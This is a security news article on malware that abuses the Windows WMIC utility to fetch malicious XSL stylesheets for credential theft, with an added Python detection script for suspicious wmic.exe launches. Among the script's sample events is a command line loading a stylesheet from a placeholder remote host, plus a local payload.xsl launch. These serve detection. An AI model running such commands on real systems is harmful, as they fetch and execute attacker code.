A new malware uses Windows utility for data theft
WMIC-based payloads highlight the cunning of attackers who use benign, built-in system utilities to gain a foothold on Windows devices.
Investigators have detected a new threat that abuses little-known Microsoft Windows utilities and harmless software to stay hidden while stealing a user's sensitive information.
As Symantec reported, the new attack relies on a technique known as “living off the land”.
What does that mean? Attackers use the legitimate tools already installed on the device they want to steal information from. Such attacks are often called fileless, because they need not write any malicious executable to disk; they leave very few traces, so the risk of detection is minimal.
A new attack chain relies on exactly this technique.
Symantec also stressed that this campaign abuses the Windows Management Instrumentation Command-line (WMIC) utility, a tool built into Microsoft Windows.
This legitimate tool provides a command-line interface to Windows Management Instrumentation (WMI), which administrators use to query system settings, control processes and execute scripts.
Combined with eXtensible Stylesheet Language (XSL) files, the utility forms one stage of a multi-step attack to steal information from Windows devices.
The attack begins with a phishing campaign that distributes a link. Clicking the fake link downloads a malicious XSL file from a remote server.
The payload contains numerous modules for stealing sensitive information: for instance, the MailPassView utility for collecting email passwords, the WebBrowser PassView tool for collecting web browser information, a keylogger, and others.
According to Symantec, the malware itself is not new and the propagation mechanism is a familiar one; what differs here is the role WMIC plays, namely downloading the malicious file. Using WMIC lets the attackers stay undetected and gives them a rather powerful tool for carrying out their malicious plans.
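The telling artefact of this technique, from a defender's point of view, is a `wmic.exe` process-creation event whose `/format:` argument points at a stylesheet that is not one of the utility's built-in formats, and especially one fetched over HTTP. The following detection logic is an added example written for this page, not code from Symantec or from the campaign described; the log records are constructed in the style of Sysmon Event ID 1 (process creation), the domain `example.invalid` is a placeholder, and the list of "suspicious parent" processes is a hypothetical watch-list chosen for illustration.

```python
import re
from dataclasses import dataclass

# Built-in WMIC /format keywords (documented Windows behaviour); anything else
# is treated as a path to or URL of a custom XSL stylesheet.
BUILTIN_FORMATS = {
    "csv", "hform", "htable", "hmof", "list", "mof", "rawxml",
    "table", "textvaluelist", "value", "xml",
}

# Hypothetical watch-list: parents from which wmic.exe rarely has a
# legitimate reason to start (e.g. Office applications, script hosts).
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "mshta.exe", "wscript.exe", "cscript.exe",
}

# /format:"quoted value"  or  /format:unquoted-value
FORMAT_RE = re.compile(r'/format:(?:"([^"]*)"|(\S+))', re.IGNORECASE)
URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample records (Sysmon Event ID 1 style), not real telemetry.
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": WMIC,
     "CommandLine": r'wmic os get /format:"https://example.invalid/report.xsl"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": WMIC,
     "CommandLine": r"wmic process list brief"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": WMIC, "CommandLine": r"wmic computersystem get /format:list"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": WMIC,
     "CommandLine": r"wmic /node:. process get /format:C:\Users\Public\payload.xsl"},
]


@dataclass
class Finding:
    event_index: int
    severity: str
    reasons: list


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(index, event):
    """Return a Finding for a suspicious wmic.exe launch, or None if it looks benign."""
    if basename(event.get("Image", "")) != "wmic.exe":
        return None
    reasons, score = [], 0

    match = FORMAT_RE.search(event.get("CommandLine", ""))
    if match:
        fmt = (match.group(1) or match.group(2)).strip()
        key = fmt.lower()
        if key.endswith(".xsl"):
            key = key[:-4]  # "/format:list.xsl" is the same built-in as "/format:list"
        if URL_RE.match(fmt):
            reasons.append(f"/format: loads a remote stylesheet: {fmt}")
            score += 3
        elif key not in BUILTIN_FORMATS:
            reasons.append(f"/format: references a custom stylesheet: {fmt}")
            score += 2

    parent = basename(event.get("ParentImage", ""))
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"wmic.exe spawned by {parent}")
        score += 2

    if not reasons:
        return None
    return Finding(index, "high" if score >= 3 else "medium", reasons)


def scan(events):
    """Run the rules over a list of process-creation records and collect findings."""
    return [f for f in (analyse_event(i, e) for i, e in enumerate(events)) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"event {finding.event_index}: {finding.severity} - " + "; ".join(finding.reasons))
```

Of the four constructed records, only the first (remote stylesheet) and the last (custom stylesheet on disk, launched from Word) are flagged; the ordinary `wmic process list brief` and the built-in `/format:list` pass, which is the point of keying the rule on the stylesheet source rather than on any use of WMIC.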
In January, investigators from FireEye reported attackers exploiting weaknesses in Microsoft Office to distribute malware capable of stealing sensitive information, mining cryptocurrency and launching distributed denial-of-service (DDoS) attacks.
That campaign uses PowerShell to gain a foothold on vulnerable systems (in that case, by dropping malware payloads).